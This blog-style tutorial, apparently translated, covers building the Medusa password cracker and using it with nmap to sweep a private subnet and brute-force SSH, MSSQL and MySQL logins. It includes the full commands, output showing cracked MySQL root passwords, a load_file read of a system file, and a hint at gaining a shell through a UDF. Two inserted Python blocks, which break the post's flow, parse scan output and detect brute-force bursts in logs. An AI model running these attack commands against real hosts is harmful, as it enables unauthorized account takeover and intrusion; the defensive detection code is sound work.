SSH Medusa 2.0 – a classic password-cracking tool for Linux


When *** networks in a Linux environment, password cracking is indispensable. This post introduces a good password-cracking tool; first, download it.

Medusa is a decent password cracker and reasonably fast. When you use it you have to supply the IPs to be cracked: Medusa has no scanning function of its own and only takes individual IPs, so it has to be paired with a tool such as nmap to obtain the list of IPs with the port open. Then set the username dictionary and the password dictionary, and the cracking can start.

./medusa -H vnc.txt -U name.txt -P pass.txt -M vnc -O r.vnc.txt

vnc.txt is the list of IPs with VNC open that are to be run.

name.txt is the username dictionary.

pass.txt is the password dictionary.

r.vnc.txt is the file the results are saved to.

 

 

wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz or curl -O http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz

 

If you do not have libssh2, install http://www.libssh2.org/download/libssh2-1.2.6.tar.gz

If it was installed wrongly, run make uninstall and install it again; once it is installed, rm -rf libssh2-1.2.2. The installation steps are:

 

tar zxvf medusa-2.0.tar.gz

cd medusa-2.0

./configure

The current version is 2.0, but there is something that looks like a bug. On CentOS the default build has no ssh module, yet configure --help shows that module defaulting to yes, so it ought to be there. You have to specify the module explicitly when building:

./configure --prefix=/tools/medusa --enable-module-ssh=yes

Check whether ssh shows up in the configure output (enable_module_ssh); if it does not, the build will have no ssh module.

make

make install

On Ubuntu it is just sudo apt-get install libssh2; on other Linux distributions it is as fiddly as above.

 

After installation, run medusa -d to check whether the modules load correctly. The following error is common:

+ ssh.mod : Couldn't load "/usr/local/lib/medusa/modules/ssh.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]

 

libssh2 is installed, but the ssh module cannot find it, so we have to add the library path by hand. Under /etc there is a file called ld.so.conf that lists the default directories for .so files, normally lib and usr/lib; the libssh2 we compiled was installed under /usr/local/lib, so that directory has to be added and then ldconfig run. The steps:

cat /etc/ld.so.conf
include ld.so.conf.d/*.conf

ls ld.so.conf.d/

echo /usr/local/lib > /etc/ld.so.conf.d/local.conf

cat /etc/ld.so.conf.d/*
/usr/local/lib
/usr/lib/mysql
/usr/lib/qt-3.3/lib

ls -l /usr/local/lib/libssh*
-rw-r--r-- 1 root root 752936 06-25 14:33 /usr/local/lib/libssh2.a
-rwxr-xr-x 1 root root 827 06-25 14:33 /usr/local/lib/libssh2.la
lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so -> libssh2.so.1.0.1
lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so.1 -> libssh2.so.1.0.1
-rwxr-xr-x 1 root root 494064 06-25 14:33 /usr/local/lib/libssh2.so.1.0.1

ldconfig

Finally, check with ldd /usr/local/lib/medusa/modules/ssh.mod that nothing is still missing.

Once the path is configured, run medusa -d again to see whether the ssh module is fine. Next comes the actual usage of Medusa:

 

# medusa

Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

 

ALERT: Host information must be supplied.

 

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

-h [TEXT] : Target hostname or IP address

-H [FILE] : File containing target hostnames or IP addresses

-u [TEXT] : Username to test

-U [FILE] : File containing usernames to test

-p [TEXT] : Password to test

-P [FILE] : File containing passwords to test

-C [FILE] : File containing combo entries. See README for more information.

-O [FILE] : File to append log information to

-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)

-M [TEXT] : Name of the module to execute (without the .mod extension)

-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a different parameter each time and they will all be sent to the module (i.e. -m Param1 -m Param2, etc.)

-d : Dump all known modules

-n [NUM] : Use for non-default TCP port number

-s : Enable SSL

-g [NUM] : Give up after trying to connect for NUM seconds (default 3)

-r [NUM] : Sleep NUM seconds between retry attempts (default 3)

-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

-t [NUM] : Total number of logins to be tested concurrently

-T [NUM] : Total number of hosts to be tested concurrently

-L : Parallelize logins using one username per thread. The default is to process the entire username before proceeding.

-f : Stop scanning host after first valid username/password found.

-F : Stop audit after first valid username/password found on any host.

-b : Suppress startup banner

-q : Display module's usage information

-v [NUM] : Verbose level [0 - 6 (more)]

-w [NUM] : Error debug level [0 - 10 (more)]

-V : Display version

-Z [NUM] : Resume scan from host #

 

Now let us see which modules Medusa has and what each of them can crack:

 

# medusa -d

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

 

Available modules in "." :

 

Available modules in "/usr/local/lib/medusa/modules" :

+ cvs.mod : Brute force module for CVS sessions : version 2.0

+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0

+ http.mod : Brute force module for HTTP : version 2.0

+ imap.mod : Brute force module for IMAP sessions : version 2.0

+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0

+ mysql.mod : Brute force module for MySQL sessions : version 2.0

+ nntp.mod : Brute force module for NNTP sessions : version 2.0

+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0

+ pop3.mod : Brute force module for POP3 sessions : version 2.0

+ rexec.mod : Brute force module for REXEC sessions : version 2.0

+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0

+ rsh.mod : Brute force module for RSH sessions : version 2.0

+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0

+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0

+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0

+ snmp.mod : Brute force module for SNMP Community Strings : version 2.0

+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0

+ telnet.mod : Brute force module for telnet sessions : version 2.0

+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0

+ vnc.mod : Brute force module for VNC sessions : version 2.0

+ web-form.mod : Brute force module for web forms : version 2.0

+ wrapper.mod : Generic Wrapper Module : version 2.0

 

The list of supported targets is very comprehensive, which is very handy for ***. First we pick targets: scan for machines with SSH open; any subnet will do. Scan the whole subnet for machines with port 22 open, detect the service version, and save the result to the file ssh:

 

nmap -sV -p22 -oG ssh 172.20.3.0/24

 

Interesting ports on 172.20.3.132:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:1E:4F:16:B9:DB (Unknown)

 

Interesting ports on 172.20.3.133:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:1E:4F:13:09:E5 (Unknown)

 

Interesting ports on 172.20.3.134:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:1E:4F:13:72:49 (Unknown)

 

...

 

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

MAC Address: 00:26:B9:5E:77:7A (Unknown)

 

Interesting ports on 172.20.3.148:

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

MAC Address: 00:26:B9:5E:79:D0 (Unknown)

 

Interesting ports on 172.20.3.150:

PORT STATE SERVICE VERSION

22/tcp closed ssh

MAC Address: 00:1E:4F:16:B8:2F (Unknown)

 

Interesting ports on 172.20.3.151:

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)

MAC Address: 00:1E:4F:16:B9:EF (Unknown)

 

Interesting ports on 172.20.3.152:

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)

MAC Address: 00:1A:A0:1C:0B:C2 (Unknown)

 

Interesting ports on 172.20.3.254:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:10:DB:FF:22:E0 (Juniper Networks)

 

Nmap finished: 256 IP addresses (64 hosts up) scanned in 33.634 seconds

cat ssh

# Nmap 4.11 scan initiated Fri Jun 25 15:25:50 2010 as: nmap -sV -p22 -oG ssh 172.20.3.0/24

Host: 172.20.3.12 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.13 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.16 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.19 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.28 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/

Host: 172.20.3.55 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.58 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.61 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/

Host: 172.20.3.62 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/

 

# Nmap run completed at Fri Jun 25 15:26:24 2010 -- 256 IP addresses (64 hosts up) scanned in 33.634 seconds

 

It looks like this. Now we have to tidy it up and pull out the IPs with SSH open; this is where saving with -oG pays off:

grep 22/open ssh | cut -d " " -f 2 >>ssh1.txt

 

cat ssh1.txt

 

172.20.3.28

172.20.3.61

172.20.3.62

172.20.3.63

172.20.3.64
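As an added example (not the post's own code), a small Python parser for the grepable format shown above: it does what the grep | cut pipeline does, but keeps state, service and version per port, so a defender inventorying exposure can also pick out SSH servers still advertising protocol 1.99. The scan data and host name in it are constructed; the addresses come from the documentation range 192.0.2.0/24.

```python
"""Parse nmap grepable (-oG) output into per-port records (added example, not from the post).
Each 'Host:' line carries 'Ports:' entries of the form
port/state/protocol/owner/service/rpc_info/version/ ; the sample below is constructed."""
import re
from typing import Dict, List

SAMPLE_OG = """\
# Nmap 4.11 scan initiated Fri Jun 25 15:25:50 2010 as: nmap -sV -p22 -oG ssh 192.0.2.0/24
Host: 192.0.2.12 ()\tPorts: 22/closed/tcp//ssh///
Host: 192.0.2.28 ()\tPorts: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 192.0.2.61 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 192.0.2.62 (db1)\tPorts: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/, 3306/open/tcp//mysql//MySQL 5.0.77/
Host: 192.0.2.254 ()\tPorts: 22/filtered/tcp//ssh///
# Nmap run completed at Fri Jun 25 15:26:24 2010 -- 256 IP addresses (64 hosts up) scanned in 33.634 seconds
"""
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+Ports:\s+(.*)$")

def parse_grepable(text: str) -> List[Dict[str, str]]:
    """One record per port entry: ip, hostname, port, state, proto, service, version."""
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and 'Host: ... Status: Up' lines carry no Ports: section
        ip, hostname, ports = m.groups()
        for entry in ports.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 7:
                continue  # nmap always writes seven '/'-separated fields; skip anything truncated
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            records.append({"ip": ip, "hostname": hostname, "port": port, "state": state,
                            "proto": proto, "service": service, "version": version})
    return records

def open_hosts(text: str, port: str) -> List[str]:
    """IPs where the given port is open (what the post's grep | cut pipeline extracts)."""
    return [r["ip"] for r in parse_grepable(text) if r["port"] == port and r["state"] == "open"]

def legacy_ssh(text: str) -> List[str]:
    """Open SSH endpoints whose banner advertises protocol 1.99, i.e. SSHv1 fallback still enabled."""
    return [f"{r['ip']}:{r['port']}" for r in parse_grepable(text)
            if r["service"] == "ssh" and r["state"] == "open" and "protocol 1.99" in r["version"]]
```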

 

Load the ssh module and crack SSH:

medusa -H ssh1.txt -u root -P p.txt -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: aaaaaa (1 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (12 of 51 complete)
...

Cracking means a long wait; SSH cracking is not fast. A dictionary of a dozen to at most 100 common passwords is recommended, otherwise the run takes a long time. Alternatively, set -G and -T to speed the cracking up somewhat.

 

It is worth scanning for SQL as well...

nmap -sV -oG mssql 172.20.0-5.1-254 -p1433   // scans 172.20.0.1-172.20.5.254

 

grep 1433/open mssql | cut -d " " -f 2 >>mssql.txt

 

medusa -H mssql.txt -u sa -P mssql_pass.dic -M mssql

 

Nothing was cracked; let us try cracking MySQL instead:

 

# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log   // results are written to pass.log

 

cat pass.log

# Medusa v.2.0 (2010-06-26 10:42:32)

# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log

ACCOUNT FOUND: [mysql] Host: 172.20.1.115 User: root Password: 12345678 [SUCCESS]

ACCOUNT FOUND: [mysql] Host: 172.20.3.58 User: root Password: mysql [SUCCESS]

# Medusa has finished (2010-06-26 10:55:11).
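From the defender's side of the SSH run and the MySQL run above, an added Python example (not from the post) that flags the trace such runs leave in logs: bursts of failed logins from one source against one service, and an SSH login accepted right after such a burst. The log lines, host name and addresses are constructed.

```python
"""Flag password-guessing bursts in sshd and MySQL logs (added example, not from the post).
Constructed log lines below follow OpenSSH's syslog 'Failed password for ... from <ip>' line and
MySQL 5.x's error-log 'Access denied for user' line (written when log_warnings is above 1)."""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

SAMPLE_LOG = """\
Jun 26 10:42:33 db1 sshd[2211]: Failed password for root from 192.0.2.99 port 40211 ssh2
Jun 26 10:42:34 db1 sshd[2215]: Failed password for invalid user admin from 192.0.2.99 port 40219 ssh2
Jun 26 10:42:36 db1 sshd[2217]: Failed password for root from 192.0.2.99 port 40223 ssh2
Jun 26 10:42:37 db1 sshd[2219]: Accepted password for root from 192.0.2.99 port 40227 ssh2
Jun 26 10:51:02 db1 sshd[2301]: Failed password for alice from 198.51.100.7 port 51000 ssh2
100626 10:42:40 [Warning] Access denied for user 'root'@'192.0.2.99' (using password: YES)
100626 10:42:41 [Warning] Access denied for user 'root'@'192.0.2.99' (using password: YES)
100626 10:42:41 [Warning] Access denied for user 'root'@'192.0.2.99' (using password: NO)
"""
FAIL = {  # each pattern captures (user, source_ip) from one failure line
    "ssh": re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+)"),
    "mysql": re.compile(r"Access denied for user '([^']+)'@'([^']+)'"),
}
SSH_OK = re.compile(r"sshd\[\d+\]: Accepted \w+ for (\S+) from (\d+\.\d+\.\d+\.\d+)")

def count_failures(log: str) -> Dict[Tuple[str, str, str], int]:
    """Failed logins keyed by (service, source_ip, user)."""
    counts: Dict[Tuple[str, str, str], int] = defaultdict(int)
    for line in log.splitlines():
        for service, pat in FAIL.items():
            m = pat.search(line)
            if m:
                counts[(service, m.group(2), m.group(1))] += 1
    return dict(counts)

def guessing_sources(log: str, threshold: int = 3) -> List[Tuple[str, str, int]]:
    """(service, source_ip, failures) for each source whose failures against one service reach threshold."""
    per_source: Dict[Tuple[str, str], int] = defaultdict(int)
    for (service, src, _user), n in count_failures(log).items():
        per_source[(service, src)] += n
    return sorted((svc, src, n) for (svc, src), n in per_source.items() if n >= threshold)

def ssh_success_after_guessing(log: str, threshold: int = 3) -> List[Tuple[str, str]]:
    """(source_ip, user) for SSH logins accepted after that source already had >= threshold failures."""
    running: Dict[str, int] = defaultdict(int)
    hits: List[Tuple[str, str]] = []
    for line in log.splitlines():
        f = FAIL["ssh"].search(line)
        if f:
            running[f.group(2)] += 1
            continue
        s = SSH_OK.search(line)
        if s and running[s.group(2)] >= threshold:
            hits.append((s.group(2), s.group(1)))
    return hits
```

A single-user dictionary run such as the -u root one above shows up as many failures for one (source, user) pair, while a -U wordlist shows up as many users from one source; the per-source sum catches both.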

 

Not bad luck. Next, connect to the MySQL on 172.20.1.115 with jspshell and run:

select load_file('c:/boot.ini');

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Windows Server 2003, Enterprise" /fastdetect /NoExecute=OptIn

So it is Win2k3; from here one could go on to write a UDF and get a shell...

 

Finally, the official notes: http://www.foofus.net/~jmk/medusa/ChangeLog

